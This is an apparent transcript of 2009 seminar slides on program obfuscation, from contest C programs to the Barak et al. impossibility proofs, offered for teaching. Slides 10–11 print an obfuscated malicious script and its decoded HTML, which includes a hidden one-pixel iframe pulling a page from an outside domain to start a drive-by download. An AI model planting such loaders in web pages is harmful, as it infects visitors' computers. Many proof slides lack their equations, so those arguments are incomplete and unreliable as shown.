Transcript
Page 1: Seminar in Cryptographic Protocols:  Program  Obfuscation

Seminar in Cryptographic Protocols: Program Obfuscation

Omer SingerJune 8, 2009

Page 2: Seminar in Cryptographic Protocols:  Program  Obfuscation

Practical Background

Page 3: Seminar in Cryptographic Protocols:  Program  Obfuscation

What is program obfuscation?

• Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.

• “The art of making things appear more complicated”

Page 4: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

What does this function do?

Page 5: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Three main values:– Potency – Resilience– Cost

• Many methods in use:– Modify variable names and layout– Replace integer values with complex equations– Change program flow– Modify data structures– Anti-disassembly (“armored” viruses)– Anti-debugging

Page 6: Seminar in Cryptographic Protocols:  Program  Obfuscation

And now for some seriously obfuscated programs…

Page 7: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the international C obfuscation contest in 1996

Shows the time on a clock with a configurable face and style

Page 8: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the international C obfuscation contest in 2001

Network-based Pong game

#include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(struct sockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_set I;struct socka\ ddr_in il;struct host\ ent*LI; struct timeval IL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);}

Page 9: Seminar in Cryptographic Protocols:  Program  Obfuscation

No more fun and games…

Page 10: Seminar in Cryptographic Protocols:  Program  Obfuscation

Actual web code blocked by an Intrusion Prevention System at a client:

<Script Language='Javascript'><!--document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E



//--></Script>

Page 11: Seminar in Cryptographic Protocols:  Program  Obfuscation

When unobfuscated…

<HTML><HEAD><TITLE></TITLE></HEAD><BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0>

<a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a>

<iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>

</BODY></HTML>

Page 12: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 13: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 14: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Obfuscation helps to bypass antivirus, delay security research response

• Obfuscated web code is often the first step in a “drive-by download” attack

• When the web code is executed by the browser it calls programs to target local software

• Result is infection of the user’s computer

Page 15: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 16: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Page 17: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Google Search Results Containing a Harmful URL

Page 18: Seminar in Cryptographic Protocols:  Program  Obfuscation

Attempt to calculate impact of obfuscated online attacks:

1 http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf2 http://viruslist.com/en/analysis?pubid=2047920563 http://www.securityfocus.com/brief/846

74% of malware spread via compromised websites2

80% of browser-based attacks are now obfuscated3

= $7.8 billion

$13.2 billion direct damages of malware1

Page 19: Seminar in Cryptographic Protocols:  Program  Obfuscation

Knowing is half the battle…

A few tips to stop obfuscated “drive-by download” attacks

• Use NoScript to block active content on Firefox

• Don’t click on web ads

• Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

Page 20: Seminar in Cryptographic Protocols:  Program  Obfuscation

Program obfuscation has some positive uses as well!

Page 21: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Preventing source code theft– Disrupt reverse engineering– Block code copying– Especially important with the increased use of Java

and .NET languages such as C# and Visual Basic which do not compile to machine code

– Microsoft recommends obfuscating ASP files in case of server compromise

• Watermarking and Digital Rights Management (DRM)

Page 22: Seminar in Cryptographic Protocols:  Program  Obfuscation

“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.”

- Chris WysopalGood Obfuscation, Bad Code

Page 23: Seminar in Cryptographic Protocols:  Program  Obfuscation

Definitions

Page 24: Seminar in Cryptographic Protocols:  Program  Obfuscation

Oracle Access

• Used by [B+] to facilitate adversary model• The oracle is some function• Adversary makes query q to the oracle, receives

answer f(q)• Useful when studying obfuscation: oracle serves

as an interface to the program without exposing contents

Page 25: Seminar in Cryptographic Protocols:  Program  Obfuscation

q q

f(q) f(q)Adversary Oracle Program

Adversary with Oracle Access

Page 26: Seminar in Cryptographic Protocols:  Program  Obfuscation

Virtual Black Box

Anything one can efficiently compute from a virtual black box, one should be able to efficiently compute given just oracle access to the program.

In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

Page 27: Seminar in Cryptographic Protocols:  Program  Obfuscation

Speaks Spanish Answers in the form of a question

qf(q)

Tell me about yourself

¿Que quieres saber?

Page 28: Seminar in Cryptographic Protocols:  Program  Obfuscation

Adversary with access to the

virtual black box

Simulator with oracle

access to the function

Page 29: Seminar in Cryptographic Protocols:  Program  Obfuscation

Circuit

In the [B+] paper on obfuscation, a circuit represents a finite length Turing machine.

Page 30: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Circuits are easier to put in a virtual black box.

• Therefore obfuscating circuits is easier than obfuscating TMs.

• Proofs in the [B+] paper first prove theorems for TM then can easily extend to circuits.

Page 31: Seminar in Cryptographic Protocols:  Program  Obfuscation

Obfuscators

• An obfuscator is an algorithm О that will restrict what an adversary can learn about P given O(P).

Page 32: Seminar in Cryptographic Protocols:  Program  Obfuscation

• What is the adversary trying to achieve?– A program that produces the same output as P – A program that produces output with some

relation to the output of P– A function that computes some function of P– Decide some property of P

• The last achievement is the weakest, we want to prove that it is impossible.

Page 33: Seminar in Cryptographic Protocols:  Program  Obfuscation

General Impossibility Proof

Page 34: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

Page 35: Seminar in Cryptographic Protocols:  Program  Obfuscation

Functionality:

For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

Page 36: Seminar in Cryptographic Protocols:  Program  Obfuscation

Polynomial slowdown:

The description length and running time of O(M) are at most polynomially larger than those of M

Page 37: Seminar in Cryptographic Protocols:  Program  Obfuscation

“Virtual black box” property:

For any PPT A, there is a PPT S and a negligible function α such that for all TMs M

Page 38: Seminar in Cryptographic Protocols:  Program  Obfuscation

Circuit Obfuscator

• Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length

• Hence the proposition:

If a TM obfuscator exists, then a circuit obfuscator exists

• Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

Page 39: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensemble

• A family of circuits such that:– Every circuit c in the family is efficient– There exists a predicate π(c) such that• π(c) is hard to compute with oracle access to the

function that c computes• π(c) is easy to compute with access to any circuit c’

that computes the same function as c

Page 40: Seminar in Cryptographic Protocols:  Program  Obfuscation

Main Proof Structure

[B+] structure their Proof the Main Impossibility Result as follows:

1. Define obfuscators that are secure when applied to two programs

2. Show that such obfuscators do not exist3. Modify the construction to prove that TM/circuit

obfuscators do not exist4. Show how this proof yields an unobfuscatable

function ensemble

Page 41: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 42: Seminar in Cryptographic Protocols:  Program  Obfuscation

2-TM Obfuscator

A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.

Page 43: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Formal definition of the strengthened “virtual black box” property:

Adversary with access to two

obfuscated TMs

Simulator with oracle access to

the two TMs

Page 44: Seminar in Cryptographic Protocols:  Program  Obfuscation

Proposition:

According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

Page 45: Seminar in Cryptographic Protocols:  Program  Obfuscation

Proof by contradiction…

• Suppose that there exists a 2-TM obfuscator O.• Consider a function that cannot be learned by oracle queries, for example the following Turing machine:

Page 46: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Define another Turing machine such that:

• Consider an adversary A such that:

A (C,D) = D(C)

Page 47: Seminar in Cryptographic Protocols:  Program  Obfuscation

Then for any α,β:

Page 48: Seminar in Cryptographic Protocols:  Program  Obfuscation

Therefore S with oracle access to and must output 1 and with oracle access to and must output 0…but S cannot differentiate between the two so we have a contradiction.

Page 49: Seminar in Cryptographic Protocols:  Program  Obfuscation

The combination of the these equations contradict the fact that O is a 2-TM obfuscator:

Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that:

Page 50: Seminar in Cryptographic Protocols:  Program  Obfuscation

In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.

Page 51: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

• [B+] extend the two-program obfuscation impossibility result to single program obfuscation.

• The extension is based on the ability to combine functions/TMs

Page 52: Seminar in Cryptographic Protocols:  Program  Obfuscation

In [B+] the combination of two functions is defined as .

A program C is decomposed into by setting .

By this definition, having oracle access to a combined function is the same as having oracle access to

and individually.

Page 53: Seminar in Cryptographic Protocols:  Program  Obfuscation

Theorem: TM obfuscators do not exist.

The adversary A is the same as before only modified to decompose the program that it receives.

Page 54: Seminar in Cryptographic Protocols:  Program  Obfuscation

Suppose for the sake of contradiction that exists TM obfuscator O.

These equations contradict the virtual black-box property required for O being a TM obfuscator.

Page 55: Seminar in Cryptographic Protocols:  Program  Obfuscation

• In [B+] this proof is extended to circuit obfuscators.

• The challenge with extending to circuit obfuscators is greater than expected– Size of the circuit is greater than the input length– Adapt the proof using homomorphic encryption

properties

Page 56: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensembles

• The case against obfuscators is further strengthened by proving the existence of unobfuscatable circuit ensembles.

Page 57: Seminar in Cryptographic Protocols:  Program  Obfuscation

The unobfuscatable circuit ensemble is defined as

Reminder:

Page 58: Seminar in Cryptographic Protocols:  Program  Obfuscation

We can now show that given any circuit that computes the same function as , we can reconstruct the latter.

• Since D’ computes the same function as D and , we have

• We can now reconstruct

Page 59: Seminar in Cryptographic Protocols:  Program  Obfuscation

Indistinguishability Obfuscator• Obfuscation models weaker than the “virtual black

box” may still be useful for software protection

• Indistinguishability obfuscator:Obfuscations of equivalent circuits of the same size

should be computationally indistinguishable.

• Later works have shown this model to be impossible to achieve as well

Page 60: Seminar in Cryptographic Protocols:  Program  Obfuscation

Software Watermarking

We would like to be able to “watermark” a program such that the code will always have a certain identifier that cannot be removed.

Page 61: Seminar in Cryptographic Protocols:  Program  Obfuscation

• A good software watermarking scheme should have the following properties:– Functionality: The marked program computes the same

function as the original program.– Meaningfulness: Most other programs don’t have this

marking.– Fragility: It is infeasible to remove the mark from the

program without (substantially) changing its behavior.

• [B+] sought to formalize the watermarking problem as it relates to obfuscation.

Page 62: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 63: Seminar in Cryptographic Protocols:  Program  Obfuscation

• [B+] sketch a proof showing that no such watermarking scheme exists.

• For any unobfuscatable program, we know that an adversary will be able to take the obfuscated (marked) program and reconstruct the (unmarked) source code.

Page 64: Seminar in Cryptographic Protocols:  Program  Obfuscation

Conclusion

• [B+] have made progress in formalizing the concept of program obfuscation.

• They have shown that the “virtual black box” paradigm is impossible to satisfy.

• Somewhat strong obfuscation of some programs remains a possibility

Page 65: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Program obfuscation has an increasingly important role in the race between hackers and the information security community.

• Additional research must be made in order to increase the effectiveness of malware detection.

• Significant progress in obfuscation techniques may break the current signature-based detection model.

Final Thoughts

Page 66: Seminar in Cryptographic Protocols:  Program  Obfuscation

Thanks for listening!